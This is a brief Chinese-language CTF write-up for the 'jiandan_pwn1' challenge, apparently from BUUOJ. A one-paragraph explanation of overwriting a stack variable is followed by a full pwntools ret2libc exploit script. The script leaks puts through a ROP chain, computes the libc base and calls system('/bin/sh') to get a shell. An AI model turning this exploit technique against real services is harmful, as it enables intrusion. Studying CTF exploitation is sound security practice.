jiandan_pwn1

一个字节一个字节输入，然后v4在rbp-4的位置，直接发送p32(0x10d),0d先放在左边(\x61)的位置，然后把值放到rsp+0x10d的位置，后面的输入也不影响v4的值。

exp

from pwn import*
from LibcSearcher import *
#p=remote("node5.buuoj.cn",27841)
p=process("./jiandan_pwn1")
context.log_level="debug"
puts_func=0x4007BF
puts_plt=0x400590
puts_got=0x601018
pop_rdi=0x400843

libc=ELF('./libc-2.23.so')
gdb.attach(p,'b *0x400783')
sleep(1)
payload=b'a'*(0x110-4)+p32(0x10d)+b'a'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_func)

p.sendlineafter('Hack 4 fun!',payload)

puts_got=u64(p.recvuntil('\x7f').strip().ljust(8,b'\x00'))
base=puts_got-libc.sym['puts']
system=base+libc.sym['system']
binsh=base+next(libc.search(b'bin/sh'))
print('puts'+hex(puts_got))
#

payload=b'a'*(0x110-4)+p32(0x10d)+b'a'*8+p64(pop_rdi)+p64(binsh)+p64(system)
p.sendline(payload)
p.interactive()